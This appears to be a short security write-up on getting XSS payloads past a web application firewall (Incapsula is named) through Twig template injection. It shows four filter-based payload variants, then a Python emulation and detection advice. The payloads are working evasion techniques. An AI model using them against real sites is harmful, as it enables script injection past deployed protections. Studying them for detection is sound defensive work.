Bypassing WAF exploiting SSTI - Twig
TLDR : SSTI in Twig can be exploited to bypass WAF.
Twig provides several string filters (replace, format, reverse) and variable assignment with set; combined, they let a payload be assembled at render time, so the string a Web Application Firewall inspects in the request never contains the final markup.
Tested WAF : Incapsula
Bypass #1 : replace filter
Payload :
{%set a="<svg oYad=aZt`1`>"%}
{{a|replace({'Y':'nlo','Z':'ler'})|raw}}
Bypass #2 : set to define variables, then concatenate them
{%set a='<svg o'%}
{%set b='nload=al'%}
{%set c='ert`1`>'%}
{{a|raw}}{{b|raw}}{{c|raw}}
The raw filter marks the value as safe, so Twig's autoescaping does not HTML-encode it on output; without raw, the assembled string would be rendered as text rather than markup.
Bypass #3 : format filter, which works much like printf
{{'<sv%snload=%s%s>'|format('g o','aler','t`1`')|raw}}
Bypass #4 : reverse filter
{{'>)1(trela=daolno gvs<'|reverse|raw}}
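To show why a signature applied to the request body misses all four payloads while the same signature applied to Twig's rendered output catches them, and why raw is the precondition, here is an added Python emulation of the three filters used above (not Twig's own code, which is PHP; the signature regex is an assumed, simplified WAF rule):

```python
import html
import re

# Emulation of the Twig string filters this page relies on. Twig's replace is
# built on PHP strtr; sequential replacement is equivalent here because the
# search keys do not overlap.
def twig_replace(s, mapping):
    for needle, repl in mapping.items():
        s = s.replace(needle, repl)
    return s

def twig_format(fmt, *args):
    return fmt % args  # Twig's format wraps sprintf; only %s is needed here

def twig_reverse(s):
    return s[::-1]

def render(value, raw):
    # Twig's default "html" autoescape strategy encodes every {{ }} output
    # unless the value was marked safe with |raw.
    return value if raw else html.escape(value, quote=True)

# What each bypass evaluates to at render time (page payloads, re-typed).
PAYLOADS = {
    "replace": twig_replace("<svg oYad=aZt`1`>", {"Y": "nlo", "Z": "ler"}),
    "set_concat": "<svg o" + "nload=al" + "ert`1`>",
    "format": twig_format("<sv%snload=%s%s>", "g o", "aler", "t`1`"),
    "reverse": twig_reverse(">)1(trela=daolno gvs<"),
}

# Assumed, simplified signature a request-inspecting WAF might use.
SIGNATURE = re.compile(r"<svg\s+onload", re.IGNORECASE)

def request_matches(template_source):
    """Signature check on the raw request body (the template source)."""
    return bool(SIGNATURE.search(template_source))

def rendered_matches(name, raw=True):
    """Signature check on what Twig would actually emit for that payload."""
    return bool(SIGNATURE.search(render(PAYLOADS[name], raw)))
```

The takeaway for detection is that inspecting request bodies for literal markup is insufficient once user input reaches the template compiler; the effective controls are keeping untrusted input out of template source and not applying raw to it.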
Link : TwigFiddle